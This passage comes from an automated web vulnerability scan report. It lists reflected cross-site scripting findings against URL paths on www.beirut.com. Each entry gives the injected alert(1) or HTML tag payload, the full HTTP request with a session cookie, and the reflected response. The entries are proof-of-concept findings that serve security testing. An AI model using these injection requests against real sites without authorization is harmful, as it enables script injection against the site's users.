4.609. http://www.beirut.com/Online-Internet/Classifieds/395527905 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Classifieds/395527905

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba3b3'-alert(1)-'bf2f86fcc9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Classifiedsba3b3'-alert(1)-'bf2f86fcc9e/395527905 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:23:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Classifiedsba3b3'-alert(1)-'bf2f86fcc9e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.610. http://www.beirut.com/Online-Internet/Design-services/3885810200 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Design-services/3885810200

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8150"><a>69b08593017 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetd8150"><a>69b08593017/Design-services/3885810200 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:04:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetd8150"><a>69b08593017">
...[SNIP]...

4.611. http://www.beirut.com/Online-Internet/Design-services/3885810200 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Design-services/3885810200

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb975'-alert(1)-'d4cd8a40ede was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internetbb975'-alert(1)-'d4cd8a40ede/Design-services/3885810200 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:17:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internetbb975'-alert(1)-'d4cd8a40ede/Design-services';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.612. http://www.beirut.com/Online-Internet/Design-services/3885810200 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Design-services/3885810200

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d2f'-alert(1)-'870f198d5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Design-servicesb5d2f'-alert(1)-'870f198d5f/3885810200 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet/Design-servicesb5d2f'-alert(1)-'870f198d5f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.613. http://www.beirut.com/Online-Internet/Directories/0054751592 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Directories/0054751592

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e02fd"><a>485acc119c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internete02fd"><a>485acc119c2/Directories/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:10:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internete02fd"><a>485acc119c2">
...[SNIP]...

4.614. http://www.beirut.com/Online-Internet/Directories/0054751592 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Directories/0054751592

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f85'-alert(1)-'f85890f381b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Interneta5f85'-alert(1)-'f85890f381b/Directories/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:20:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Interneta5f85'-alert(1)-'f85890f381b/Directories';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.615. http://www.beirut.com/Online-Internet/Directories/0054751592 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Directories/0054751592

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 231fc'-alert(1)-'973dc70caef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Directories231fc'-alert(1)-'973dc70caef/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:23:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet/Directories231fc'-alert(1)-'973dc70caef';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.616. http://www.beirut.com/Online-Internet/Fashion-and-Shopping/8023704728 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Fashion-and-Shopping/8023704728

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b7e"><a>add34d5e1c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetd2b7e"><a>add34d5e1c7/Fashion-and-Shopping/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:14:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetd2b7e"><a>add34d5e1c7">
...[SNIP]...

4.617. http://www.beirut.com/Online-Internet/Fashion-and-Shopping/8023704728 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Fashion-and-Shopping/8023704728

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3279c'-alert(1)-'cfab6d99f78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet3279c'-alert(1)-'cfab6d99f78/Fashion-and-Shopping/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet3279c'-alert(1)-'cfab6d99f78/Fashion-and-Shopping';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.618. http://www.beirut.com/Online-Internet/Fashion-and-Shopping/8023704728 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Fashion-and-Shopping/8023704728

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acba4'-alert(1)-'a9e9c40c78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Fashion-and-Shoppingacba4'-alert(1)-'a9e9c40c78/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:27:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Fashion-and-Shoppingacba4'-alert(1)-'a9e9c40c78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.619. http://www.beirut.com/Online-Internet/Foreign-Exchange/5783938930 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Foreign-Exchange/5783938930

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0dd"><a>8ac9e9b9414 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet4d0dd"><a>8ac9e9b9414/Foreign-Exchange/5783938930 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:03:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet4d0dd"><a>8ac9e9b9414">
...[SNIP]...

4.620. http://www.beirut.com/Online-Internet/Foreign-Exchange/5783938930 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Foreign-Exchange/5783938930

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2476b'-alert(1)-'ec45706067d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet2476b'-alert(1)-'ec45706067d/Foreign-Exchange/5783938930 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:14:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet2476b'-alert(1)-'ec45706067d/Foreign-Exchange';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.621. http://www.beirut.com/Online-Internet/Foreign-Exchange/5783938930 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Foreign-Exchange/5783938930

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b232d'-alert(1)-'48f8420c6b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Foreign-Exchangeb232d'-alert(1)-'48f8420c6b6/5783938930 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:18:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Foreign-Exchangeb232d'-alert(1)-'48f8420c6b6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.622. http://www.beirut.com/Online-Internet/Games-Entertainment/078114628 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Games-Entertainment/078114628

Issue detail

